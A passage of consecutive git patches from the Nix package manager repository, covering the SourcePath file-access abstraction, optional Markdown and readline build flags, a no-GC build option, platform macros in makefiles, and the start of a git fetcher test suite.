+SourcePath SourcePath::parent() const +{ + auto p = path.parent(); + assert(p); + return {accessor, std::move(*p)}; +} + +std::string SourcePath::readFile() const +{ return accessor->readFile(path); } + +bool SourcePath::pathExists() const +{ return accessor->pathExists(path); } + +InputAccessor::Stat SourcePath::lstat() const +{ return accessor->lstat(path); } + +std::optional SourcePath::maybeLstat() const +{ return accessor->maybeLstat(path); } + +InputAccessor::DirEntries SourcePath::readDirectory() const +{ return accessor->readDirectory(path); } + +std::string SourcePath::readLink() const +{ return accessor->readLink(path); } + +void SourcePath::dumpPath( + Sink & sink, + PathFilter & filter) const +{ return accessor->dumpPath(path, sink, filter); } + +std::optional SourcePath::getPhysicalPath() const +{ return accessor->getPhysicalPath(path); } + +std::string SourcePath::to_string() const +{ return accessor->showPath(path); } + +SourcePath SourcePath::operator+(const CanonPath & x) const +{ return {accessor, path + x}; } + +SourcePath SourcePath::operator+(std::string_view c) const +{ return {accessor, path + c}; } + +bool SourcePath::operator==(const SourcePath & x) const +{ + return std::tie(*accessor, path) == std::tie(*x.accessor, x.path); +} + +bool SourcePath::operator!=(const SourcePath & x) const +{ + return std::tie(*accessor, path) != std::tie(*x.accessor, x.path); +} + +bool SourcePath::operator<(const SourcePath & x) const +{ + return std::tie(*accessor, path) < std::tie(*x.accessor, x.path); +} + +SourcePath SourcePath::resolveSymlinks() const +{ + auto res = SourcePath(accessor); + + int linksAllowed = 1024; + + std::list todo; + for (auto & c : path) + todo.push_back(std::string(c)); + + while (!todo.empty()) { + auto c = *todo.begin(); + todo.pop_front(); + if (c == "" || c == ".") + ; + else if (c == "..") + res.path.pop(); + else { + res.path.push(c); + if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) { + if (!linksAllowed--) + throw Error("infinite symlink recursion in path '%s'", path); + auto target = res.readLink(); + res.path.pop(); + if (hasPrefix(target, "/")) + res.path = CanonPath::root; + todo.splice(todo.begin(), tokenizeString>(target, "/")); + } + } + } + + return res; +} + +std::ostream & operator<<(std::ostream & str, const SourcePath & path) +{ + str << path.to_string(); + return str; +} + +} diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh new file mode 100644 index 000000000..bf5625ca5 --- /dev/null +++ b/src/libutil/source-path.hh @@ -0,0 +1,114 @@ +#pragma once +/** + * @file + * + * @brief SourcePath + */ + +#include "ref.hh" +#include "canon-path.hh" +#include "input-accessor.hh" + +namespace nix { + +/** + * An abstraction for accessing source files during + * evaluation. Currently, it's just a wrapper around `CanonPath` that + * accesses files in the regular filesystem, but in the future it will + * support fetching files in other ways. + */ +struct SourcePath +{ + ref accessor; + CanonPath path; + + SourcePath(ref accessor, CanonPath path = CanonPath::root) + : accessor(std::move(accessor)) + , path(std::move(path)) + { } + + std::string_view baseName() const; + + /** + * Construct the parent of this `SourcePath`. Aborts if `this` + * denotes the root. + */ + SourcePath parent() const; + + /** + * If this `SourcePath` denotes a regular file (not a symlink), + * return its contents; otherwise throw an error. + */ + std::string readFile() const; + + /** + * Return whether this `SourcePath` denotes a file (of any type) + * that exists + */ + bool pathExists() const; + + /** + * Return stats about this `SourcePath`, or throw an exception if + * it doesn't exist. + */ + InputAccessor::Stat lstat() const; + + /** + * Return stats about this `SourcePath`, or std::nullopt if it + * doesn't exist. + */ + std::optional maybeLstat() const; + + /** + * If this `SourcePath` denotes a directory (not a symlink), + * return its directory entries; otherwise throw an error. + */ + InputAccessor::DirEntries readDirectory() const; + + /** + * If this `SourcePath` denotes a symlink, return its target; + * otherwise throw an error. + */ + std::string readLink() const; + + /** + * Dump this `SourcePath` to `sink` as a NAR archive. + */ + void dumpPath( + Sink & sink, + PathFilter & filter = defaultPathFilter) const; + + /** + * Return the location of this path in the "real" filesystem, if + * it has a physical location. + */ + std::optional getPhysicalPath() const; + + std::string to_string() const; + + /** + * Append a `CanonPath` to this path. + */ + SourcePath operator + (const CanonPath & x) const; + + /** + * Append a single component `c` to this path. `c` must not + * contain a slash. A slash is implicitly added between this path + * and `c`. + */ + SourcePath operator+(std::string_view c) const; + bool operator==(const SourcePath & x) const; + bool operator!=(const SourcePath & x) const; + bool operator<(const SourcePath & x) const; + + /** + * Resolve any symlinks in this `SourcePath` (including its + * parents). The result is a `SourcePath` in which no element is a + * symlink. + */ + SourcePath resolveSymlinks() const; +}; + +std::ostream & operator << (std::ostream & str, const SourcePath & path); + +} From bbd0a959e17e988ef1ec2fadd1ab5bb66420fd6f Mon Sep 17 00:00:00 2001 From: Weijia Wang <9713184+wegank@users.noreply.github.com> Date: Mon, 8 Jan 2024 20:37:42 +0100 Subject: [PATCH 207/654] Make lowdown optional Co-authored-by: John Ericson --- configure.ac | 16 +++++++++++++++- package.nix | 5 +++++ src/libcmd/markdown.cc | 6 ++++++ 3 files changed, 26 insertions(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index b97e25bbd..929750932 100644 --- a/configure.ac +++ b/configure.ac @@ -374,7 +374,21 @@ PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) # Look for lowdown library. -PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS"]) +AC_ARG_ENABLE([markdown], AS_HELP_STRING([--enable-markdown], [Enable Markdown rendering in the Nix binary (requires lowdown) [default=auto]]), + enable_markdown=$enableval, enable_markdown=auto) +AS_CASE(["$enable_markdown"], + [yes | auto], [ + PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [ + CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS" + have_lowdown=1 + AC_DEFINE(HAVE_LOWDOWN, 1, [Whether lowdown is available and should be used for Markdown rendering.]) + ], [ + AS_IF([test "x$enable_markdown" == "xyes"], [AC_MSG_ERROR([--enable-markdown was specified, but lowdown was not found.])]) + ]) + ], + [no], [have_lowdown=], + [AC_MSG_ERROR([--enable-markdown must be one of: yes, no, auto])]) +AC_SUBST(HAVE_LOWDOWN, [$have_lowdown]) # Look for libgit2. diff --git a/package.nix b/package.nix index dfebdb0e4..dd37809d0 100644 --- a/package.nix +++ b/package.nix @@ -68,6 +68,9 @@ # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +# Whether to enable Markdown rendering in the Nix binary. +, enableMarkdown ? !stdenv.hostPlatform.isWindows + # Whether to compile `rl-next.md`, the release notes for the next # not-yet-released version of Nix in the manul, from the individual # change log entries in the directory. @@ -213,6 +216,7 @@ in { xz ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ editline + ] ++ lib.optionals enableMarkdown [ lowdown ] ++ lib.optionals buildUnitTests [ gtest @@ -269,6 +273,7 @@ in { (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") + (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") ] ++ lib.optionals (!forDevShell) [ "--sysconfdir=/etc" diff --git a/src/libcmd/markdown.cc b/src/libcmd/markdown.cc index 8b3bbc1b5..a4e3c5a77 100644 --- a/src/libcmd/markdown.cc +++ b/src/libcmd/markdown.cc @@ -4,12 +4,15 @@ #include "terminal.hh" #include +#if HAVE_LOWDOWN #include +#endif namespace nix { std::string renderMarkdownToTerminal(std::string_view markdown) { +#if HAVE_LOWDOWN int windowWidth = getWindowSize().second; struct lowdown_opts opts { @@ -48,6 +51,9 @@ std::string renderMarkdownToTerminal(std::string_view markdown) throw Error("allocation error while rendering Markdown"); return filterANSIEscapes(std::string(buf->data, buf->size), !shouldANSI()); +#else + return std::string(markdown); +#endif } } From 29eb5ed1dc54ec45ab23b50ef259d2b370e8b1e8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 8 Jan 2024 14:47:42 -0500 Subject: [PATCH 208/654] Fix Internal API docs Because of source filtering, they were empty. Fixes #9694 --- package.nix | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/package.nix b/package.nix index dfebdb0e4..aad022b32 100644 --- a/package.nix +++ b/package.nix @@ -164,6 +164,10 @@ in { ./doc/manual ] ++ lib.optionals enableInternalAPIDocs [ ./doc/internal-api + # Source might not be compiled, but still must be available + # for Doxygen to gather comments. + ./src + ./tests/unit ] ++ lib.optionals buildUnitTests [ ./tests/unit ] ++ lib.optionals doInstallCheck [ From 3d9e0c60e4cf135943d2c72a990ff2c0e3e311a7 Mon Sep 17 00:00:00 2001 From: DavHau Date: Tue, 9 Jan 2024 18:36:09 +0700 Subject: [PATCH 209/654] gitignore: add result-* --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index d9f9d949b..a47b195bb 100644 --- a/.gitignore +++ b/.gitignore @@ -141,6 +141,7 @@ compile_commands.json nix-rust/target result +result-* # IDE .vscode/ From 2cea88dbc8c277d7403e6dd65f482fd2eb931e52 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 15:56:37 -0400 Subject: [PATCH 210/654] Improve build sytem support for readline instead of editline Changes: - CPP variable is now `USE_READLINE` not `READLINE` - `configure.ac` supports with new CLI flag - `package.nix` supports with new configuration option - `flake.nix` CIs this (along with no markdown) Remove old Ubuntu 16.04 stop-gap too, as that is now quite old. Motivation: - editline does not build for Windows, but readline *should*. (I am still working on this in Nixpkgs at this time, however. So there will be a follow-up Nix PR removing the windows-only skipping of the readline library once I am done.) - Per https://salsa.debian.org/debian/nix/-/blob/master/debian/rules?ref_type=heads#L27 and #2551, Debian builds Nix with readline. Now we better support and CI that build configuration. This is picking up where #2551 left off, ensuring we test a few more things not merely have CPP for them. Co-authored-by: Weijia Wang <9713184+wegank@users.noreply.github.com> --- configure.ac | 29 ++++++++++++++++++----------- flake.nix | 9 +++++++++ package.nix | 12 +++++++++++- src/libcmd/repl.cc | 6 +++--- 4 files changed, 41 insertions(+), 15 deletions(-) diff --git a/configure.ac b/configure.ac index fdbb2629e..2594544ab 100644 --- a/configure.ac +++ b/configure.ac @@ -251,17 +251,25 @@ PKG_CHECK_MODULES([SQLITE3], [sqlite3 >= 3.6.19], [CXXFLAGS="$SQLITE3_CFLAGS $CX # Look for libcurl, a required dependency. PKG_CHECK_MODULES([LIBCURL], [libcurl], [CXXFLAGS="$LIBCURL_CFLAGS $CXXFLAGS"]) -# Look for editline, a required dependency. +# Look for editline or readline, a required dependency. # The the libeditline.pc file was added only in libeditline >= 1.15.2, # see https://github.com/troglobit/editline/commit/0a8f2ef4203c3a4a4726b9dd1336869cd0da8607, -# but e.g. Ubuntu 16.04 has an older version, so we fall back to searching for -# editline.h when the pkg-config approach fails. -PKG_CHECK_MODULES([EDITLINE], [libeditline], [CXXFLAGS="$EDITLINE_CFLAGS $CXXFLAGS"], [ - AC_CHECK_HEADERS([editline.h], [true], - [AC_MSG_ERROR([Nix requires libeditline; it was found neither via pkg-config nor its normal header.])]) - AC_SEARCH_LIBS([readline read_history], [editline], [], - [AC_MSG_ERROR([Nix requires libeditline; it was not found via pkg-config, but via its header, but required functions do not work. Maybe it is too old? >= 1.14 is required.])]) -]) +# Older versions are no longer supported. +AC_ARG_WITH( + [readline-flavor], + AS_HELP_STRING([--with-readline-flavor],[Which library to use for nice line editting with the Nix language REPL" [default=editline]]), + [readline_flavor=$withval], + [readline_flavor=editline]) +AS_CASE(["$readline_flavor"], + [editline], [ + readline_flavor_pc=libeditline + ], + [readline], [ + readline_flavor_pc=readline + AC_DEFINE([USE_READLINE], [1], [Use readline instead of editline]) + ], + [AC_MSG_ERROR([bad value "$readline_flavor" for --with-readline-flavor, must be one of: editline, readline])]) +PKG_CHECK_MODULES([EDITLINE], [$readline_flavor_pc], [CXXFLAGS="$EDITLINE_CFLAGS $CXXFLAGS"]) # Look for libsodium. PKG_CHECK_MODULES([SODIUM], [libsodium], [CXXFLAGS="$SODIUM_CFLAGS $CXXFLAGS"]) @@ -387,8 +395,7 @@ AS_CASE(["$enable_markdown"], ]) ], [no], [have_lowdown=], - [AC_MSG_ERROR([--enable-markdown must be one of: yes, no, auto])]) -AC_SUBST(HAVE_LOWDOWN, [$have_lowdown]) + [AC_MSG_ERROR([bad value "$enable_markdown" for --enable-markdown, must be one of: yes, no, auto])]) # Look for libgit2. diff --git a/flake.nix b/flake.nix index 32354a88f..c7aee7541 100644 --- a/flake.nix +++ b/flake.nix @@ -230,6 +230,15 @@ } ); + # Toggles some settings for better coverage. Windows needs these + # library combinations, and Debian build Nix with GNU readline too. + buildReadlineNoMarkdown = forAllSystems (system: + self.packages.${system}.nix.override { + enableMarkdown = false; + readlineFlavor = "readline"; + } + ); + # Perl bindings for various platforms. perlBindings = forAllSystems (system: nixpkgsFor.${system}.native.nix.perl-bindings); diff --git a/package.nix b/package.nix index 727f5e646..d0b9fc3f3 100644 --- a/package.nix +++ b/package.nix @@ -13,6 +13,7 @@ , changelog-d , curl , editline +, readline , fileset , flex , git @@ -71,6 +72,14 @@ # Whether to enable Markdown rendering in the Nix binary. , enableMarkdown ? !stdenv.hostPlatform.isWindows +# Which interactive line editor library to use for Nix's repl. +# +# Currently supported choices are: +# +# - editline (default) +# - readline +, readlineFlavor ? if stdenv.hostPlatform.isWindows then "readline" else "editline" + # Whether to compile `rl-next.md`, the release notes for the next # not-yet-released version of Nix in the manul, from the individual # change log entries in the directory. @@ -219,7 +228,7 @@ in { sqlite xz ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ - editline + ({ inherit readline editline; }.${readlineFlavor}) ] ++ lib.optionals enableMarkdown [ lowdown ] ++ lib.optionals buildUnitTests [ @@ -279,6 +288,7 @@ in { (lib.enableFeature enableManual "doc-gen") (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") + (lib.withFeatureAs true "readline-flavor" readlineFlavor) ] ++ lib.optionals (!forDevShell) [ "--sysconfdir=/etc" ] ++ lib.optionals installUnitTests [ diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index dea91ba63..9c92f2b6e 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -5,7 +5,7 @@ #include -#ifdef READLINE +#ifdef USE_READLINE #include #include #else @@ -249,14 +249,14 @@ void NixRepl::mainLoop() } catch (SysError & e) { logWarning(e.info()); } -#ifndef READLINE +#ifndef USE_READLINE el_hist_size = 1000; #endif read_history(historyFile.c_str()); auto oldRepl = curRepl; curRepl = this; Finally restoreRepl([&] { curRepl = oldRepl; }); -#ifndef READLINE +#ifndef USE_READLINE rl_set_complete_func(completionCallback); rl_set_list_possib_func(listPossibleCallback); #endif From 0c3ce237549d43de52e897f12e6d6c8ee59ac227 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 17:31:40 -0500 Subject: [PATCH 211/654] Improve the build without GC We don't just want to pass `--enable-gc=no`; we also want to make sure boehmgc is not a dependency. Creating a nix-level configuration option to do both, and then using that for the CI job, is more robust. --- flake.nix | 4 +++- package.nix | 12 ++++++++++-- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/flake.nix b/flake.nix index c7aee7541..49f214e72 100644 --- a/flake.nix +++ b/flake.nix @@ -220,7 +220,9 @@ buildCross = forAllCrossSystems (crossSystem: lib.genAttrs ["x86_64-linux"] (system: self.packages.${system}."nix-${crossSystem}")); - buildNoGc = forAllSystems (system: self.packages.${system}.nix.overrideAttrs (a: { configureFlags = (a.configureFlags or []) ++ ["--enable-gc=no"];})); + buildNoGc = forAllSystems (system: + self.packages.${system}.nix.override { enableGC = false; } + ); buildNoTests = forAllSystems (system: self.packages.${system}.nix.override { diff --git a/package.nix b/package.nix index d0b9fc3f3..71ee80e33 100644 --- a/package.nix +++ b/package.nix @@ -69,6 +69,14 @@ # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +# Whether to use garbage collection for the Nix language evaluator. +# +# If it is disabled, we just leak memory, but this is not as bad as it +# sounds so long as evaluation just takes places within short-lived +# processes. (When the process exits, the memory is reclaimed; it is +# only leaked *within* the process.) +, enableGC ? true + # Whether to enable Markdown rendering in the Nix binary. , enableMarkdown ? !stdenv.hostPlatform.isWindows @@ -245,9 +253,8 @@ in { ; propagatedBuildInputs = [ - boehmgc nlohmann_json - ]; + ] ++ lib.optional enableGC boehmgc; dontBuild = !attrs.doBuild; doCheck = attrs.doCheck; @@ -286,6 +293,7 @@ in { (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") + (lib.enableFeature enableGC "gc") (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") (lib.withFeatureAs true "readline-flavor" readlineFlavor) From 57dc4fc878bc74dfb38cd9d435a85c560b43cebb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 16:21:44 -0400 Subject: [PATCH 212/654] Make more expressive `HOST_*` macro system --- mk/lib.mk | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/mk/lib.mk b/mk/lib.mk index 3d503364f..a5a067e48 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -14,20 +14,34 @@ install-tests-groups := ifdef HOST_OS HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) + ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) + HOST_MINGW = 1 + HOST_WINDOWS = 1 + endif ifeq ($(HOST_KERNEL), cygwin) HOST_CYGWIN = 1 + HOST_WINDOWS = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) HOST_DARWIN = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) HOST_FREEBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) + HOST_NETBSD = 1 + HOST_UNIX = 1 endif ifeq ($(HOST_KERNEL), linux) HOST_LINUX = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) HOST_SOLARIS = 1 + HOST_UNIX = 1 endif endif From f9e5eb5f0a61555d24fe85b8edccf49f0b176152 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 10 Jan 2024 20:26:02 -0500 Subject: [PATCH 213/654] Make indentation in makesfiles consistent Tab (as required) for rules, two spaces for `if`...`endif`. --- src/libexpr/local.mk | 2 +- src/libstore/local.mk | 12 ++++++------ src/libutil/local.mk | 2 +- tests/functional/local.mk | 10 +++++----- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/src/libexpr/local.mk b/src/libexpr/local.mk index ed6bc761a..b60936a0e 100644 --- a/src/libexpr/local.mk +++ b/src/libexpr/local.mk @@ -18,7 +18,7 @@ libexpr_LIBS = libutil libstore libfetchers libexpr_LDFLAGS += -lboost_context -pthread ifdef HOST_LINUX - libexpr_LDFLAGS += -ldl + libexpr_LDFLAGS += -ldl endif # The dependency on libgc must be propagated (i.e. meaning that diff --git a/src/libstore/local.mk b/src/libstore/local.mk index 675976314..f447e190d 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -16,15 +16,15 @@ endif $(foreach file,$(libstore_FILES),$(eval $(call install-data-in,$(d)/$(file),$(datadir)/nix/sandbox))) ifeq ($(ENABLE_S3), 1) - libstore_LDFLAGS += -laws-cpp-sdk-transfer -laws-cpp-sdk-s3 -laws-cpp-sdk-core -laws-crt-cpp + libstore_LDFLAGS += -laws-cpp-sdk-transfer -laws-cpp-sdk-s3 -laws-cpp-sdk-core -laws-crt-cpp endif ifdef HOST_SOLARIS - libstore_LDFLAGS += -lsocket + libstore_LDFLAGS += -lsocket endif ifeq ($(HAVE_SECCOMP), 1) - libstore_LDFLAGS += $(LIBSECCOMP_LIBS) + libstore_LDFLAGS += $(LIBSECCOMP_LIBS) endif libstore_CXXFLAGS += \ @@ -48,9 +48,9 @@ $(d)/embedded-sandbox-shell.gen.hh: $(sandbox_shell) $(trace-gen) hexdump -v -e '1/1 "0x%x," "\n"' < $< > $@.tmp @mv $@.tmp $@ else -ifneq ($(sandbox_shell),) -libstore_CXXFLAGS += -DSANDBOX_SHELL="\"$(sandbox_shell)\"" -endif + ifneq ($(sandbox_shell),) + libstore_CXXFLAGS += -DSANDBOX_SHELL="\"$(sandbox_shell)\"" + endif endif $(d)/local-store.cc: $(d)/schema.sql.gen.hh $(d)/ca-specific-schema.sql.gen.hh diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 0fdebaf5c..6e3d6d052 100644 --- a/src/libutil/local.mk +++ b/src/libutil/local.mk @@ -17,5 +17,5 @@ $(foreach i, $(wildcard $(d)/signature/*.hh), \ ifeq ($(HAVE_LIBCPUID), 1) - libutil_LDFLAGS += -lcpuid + libutil_LDFLAGS += -lcpuid endif diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 192e275e3..25fcbcfe7 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -129,15 +129,15 @@ nix_tests = \ impure-env.sh ifeq ($(HAVE_LIBCPUID), 1) - nix_tests += compute-levels.sh + nix_tests += compute-levels.sh endif ifeq ($(ENABLE_BUILD), yes) - nix_tests += test-libstoreconsumer.sh + nix_tests += test-libstoreconsumer.sh - ifeq ($(BUILD_SHARED_LIBS), 1) - nix_tests += plugins.sh - endif + ifeq ($(BUILD_SHARED_LIBS), 1) + nix_tests += plugins.sh + endif endif $(d)/test-libstoreconsumer.sh.test $(d)/test-libstoreconsumer.sh.test-debug: \ From 423484ad26850046c101affc9ff6ac4c36ccda06 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 12:29:37 -0500 Subject: [PATCH 214/654] Only link with `-pthread` on Unix We don't want this with MinGW. --- mk/libraries.mk | 6 ++++++ src/libcmd/local.mk | 2 +- src/libexpr/local.mk | 2 +- src/libfetchers/local.mk | 2 +- src/libstore/local.mk | 2 +- src/libutil/local.mk | 2 +- src/nix/local.mk | 2 +- tests/functional/test-libstoreconsumer/local.mk | 2 +- tests/unit/libexpr-support/local.mk | 2 +- tests/unit/libstore-support/local.mk | 2 +- tests/unit/libutil-support/local.mk | 2 +- 11 files changed, 16 insertions(+), 10 deletions(-) diff --git a/mk/libraries.mk b/mk/libraries.mk index 1bc73d7f7..515a481f6 100644 --- a/mk/libraries.mk +++ b/mk/libraries.mk @@ -10,6 +10,12 @@ else endif endif +ifdef HOST_UNIX + THREAD_LDFLAGS = -pthread +else + THREAD_LDFLAGS = +endif + # Build a library with symbolic name $(1). The library is defined by # various variables prefixed by ‘$(1)_’: # diff --git a/src/libcmd/local.mk b/src/libcmd/local.mk index afd35af08..abb7459a7 100644 --- a/src/libcmd/local.mk +++ b/src/libcmd/local.mk @@ -8,7 +8,7 @@ libcmd_SOURCES := $(wildcard $(d)/*.cc) libcmd_CXXFLAGS += -I src/libutil -I src/libstore -I src/libexpr -I src/libmain -I src/libfetchers -libcmd_LDFLAGS = $(EDITLINE_LIBS) $(LOWDOWN_LIBS) -pthread +libcmd_LDFLAGS = $(EDITLINE_LIBS) $(LOWDOWN_LIBS) $(THREAD_LDFLAGS) libcmd_LIBS = libstore libutil libexpr libmain libfetchers diff --git a/src/libexpr/local.mk b/src/libexpr/local.mk index b60936a0e..0c3e36750 100644 --- a/src/libexpr/local.mk +++ b/src/libexpr/local.mk @@ -16,7 +16,7 @@ libexpr_CXXFLAGS += -I src/libutil -I src/libstore -I src/libfetchers -I src/lib libexpr_LIBS = libutil libstore libfetchers -libexpr_LDFLAGS += -lboost_context -pthread +libexpr_LDFLAGS += -lboost_context $(THREAD_LDFLAGS) ifdef HOST_LINUX libexpr_LDFLAGS += -ldl endif diff --git a/src/libfetchers/local.mk b/src/libfetchers/local.mk index 266e7a211..e54db4937 100644 --- a/src/libfetchers/local.mk +++ b/src/libfetchers/local.mk @@ -8,6 +8,6 @@ libfetchers_SOURCES := $(wildcard $(d)/*.cc) libfetchers_CXXFLAGS += -I src/libutil -I src/libstore -libfetchers_LDFLAGS += -pthread $(LIBGIT2_LIBS) -larchive +libfetchers_LDFLAGS += $(THREAD_LDFLAGS) $(LIBGIT2_LIBS) -larchive libfetchers_LIBS = libutil libstore diff --git a/src/libstore/local.mk b/src/libstore/local.mk index f447e190d..f86643849 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -8,7 +8,7 @@ libstore_SOURCES := $(wildcard $(d)/*.cc $(d)/builtins/*.cc $(d)/build/*.cc) libstore_LIBS = libutil -libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) -pthread +libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) $(THREAD_LDFLAGS) ifdef HOST_LINUX libstore_LDFLAGS += -ldl endif diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 6e3d6d052..200026c1e 100644 --- a/src/libutil/local.mk +++ b/src/libutil/local.mk @@ -8,7 +8,7 @@ libutil_SOURCES := $(wildcard $(d)/*.cc $(d)/signature/*.cc) libutil_CXXFLAGS += -I src/libutil -libutil_LDFLAGS += -pthread $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context +libutil_LDFLAGS += $(THREAD_LDFLAGS) $(LIBCURL_LIBS) $(SODIUM_LIBS) $(OPENSSL_LIBS) $(LIBBROTLI_LIBS) $(LIBARCHIVE_LIBS) $(BOOST_LDFLAGS) -lboost_context $(foreach i, $(wildcard $(d)/args/*.hh), \ $(eval $(call install-file-in, $(i), $(includedir)/nix/args, 0644))) diff --git a/src/nix/local.mk b/src/nix/local.mk index a21aa705f..1d6f560d6 100644 --- a/src/nix/local.mk +++ b/src/nix/local.mk @@ -18,7 +18,7 @@ nix_CXXFLAGS += -I src/libutil -I src/libstore -I src/libfetchers -I src/libexpr nix_LIBS = libexpr libmain libfetchers libstore libutil libcmd -nix_LDFLAGS = -pthread $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) +nix_LDFLAGS = $(THREAD_LDFLAGS) $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) $(foreach name, \ nix-build nix-channel nix-collect-garbage nix-copy-closure nix-daemon nix-env nix-hash nix-instantiate nix-prefetch-url nix-shell nix-store, \ diff --git a/tests/functional/test-libstoreconsumer/local.mk b/tests/functional/test-libstoreconsumer/local.mk index edc140723..a1825c405 100644 --- a/tests/functional/test-libstoreconsumer/local.mk +++ b/tests/functional/test-libstoreconsumer/local.mk @@ -12,4 +12,4 @@ test-libstoreconsumer_CXXFLAGS += -I src/libutil -I src/libstore test-libstoreconsumer_LIBS = libstore libutil -test-libstoreconsumer_LDFLAGS = -pthread $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) +test-libstoreconsumer_LDFLAGS = $(THREAD_LDFLAGS) $(SODIUM_LIBS) $(EDITLINE_LIBS) $(BOOST_LDFLAGS) $(LOWDOWN_LIBS) diff --git a/tests/unit/libexpr-support/local.mk b/tests/unit/libexpr-support/local.mk index 12a76206a..0501de33c 100644 --- a/tests/unit/libexpr-support/local.mk +++ b/tests/unit/libexpr-support/local.mk @@ -20,4 +20,4 @@ libexpr-test-support_LIBS = \ libstore-test-support libutil-test-support \ libexpr libstore libutil -libexpr-test-support_LDFLAGS := -pthread -lrapidcheck +libexpr-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck diff --git a/tests/unit/libstore-support/local.mk b/tests/unit/libstore-support/local.mk index ff075c96a..56dedd825 100644 --- a/tests/unit/libstore-support/local.mk +++ b/tests/unit/libstore-support/local.mk @@ -18,4 +18,4 @@ libstore-test-support_LIBS = \ libutil-test-support \ libstore libutil -libstore-test-support_LDFLAGS := -pthread -lrapidcheck +libstore-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck diff --git a/tests/unit/libutil-support/local.mk b/tests/unit/libutil-support/local.mk index 2ee2cdb6c..5f7835c9f 100644 --- a/tests/unit/libutil-support/local.mk +++ b/tests/unit/libutil-support/local.mk @@ -16,4 +16,4 @@ libutil-test-support_CXXFLAGS += $(libutil-tests_EXTRA_INCLUDES) libutil-test-support_LIBS = libutil -libutil-test-support_LDFLAGS := -pthread -lrapidcheck +libutil-test-support_LDFLAGS := $(THREAD_LDFLAGS) -lrapidcheck From 813c113b9ecfab917e6d43ac5831a4f207fecaf0 Mon Sep 17 00:00:00 2001 From: DavHau Date: Fri, 29 Dec 2023 15:15:16 +0700 Subject: [PATCH 215/654] initialize test suite for git fetchers solves #9388 This utilizes nixos vm tests to allow: - writing tests for fetchTree and fetchGit involving actual networking. - writing small independent test cases by automating local and remote repository setup per test case. This adds: - a gitea module setting up a gitea server - a setup module that simplifies writing test cases by automating the repo setup. - a simple git http test case Other improvements: For all nixos tests, add capability of overriding the nix version to test against. This should make it easier to prevent regressions. If a new test is added it can simply be ran against any older nix version without having to backport the test. For example, for running the container tests against nix 2.12.0: `nix build "$(nix eval --raw .#hydraJobs.tests.containers --impure --apply 't: (t.forNix "2.12.0").drvPath')^*" -L` --- tests/nixos/default.nix | 30 ++++-- tests/nixos/fetch-git/default.nix | 60 +++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 63 ++++++++++++ tests/nixos/fetch-git/testsupport/setup.nix | 106 ++++++++++++++++++++ 4 files changed, 252 insertions(+), 7 deletions(-) create mode 100644 tests/nixos/fetch-git/default.nix create mode 100644 tests/nixos/fetch-git/testsupport/gitea.nix create mode 100644 tests/nixos/fetch-git/testsupport/setup.nix diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 